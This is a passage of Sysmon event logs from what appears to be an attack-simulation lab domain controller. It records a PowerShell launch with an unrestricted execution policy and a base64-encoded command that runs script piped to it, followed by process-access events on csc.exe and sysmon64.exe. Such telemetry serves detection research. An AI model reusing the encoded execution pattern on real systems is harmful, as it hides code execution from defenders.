JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.058","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\mp0obxps.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","ParentProcessId":"4660","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nSourceProcessId: 4660\r\nSourceThreadId: 3452\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","SourceProcessId":"4660","SourceThreadId":"3452","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT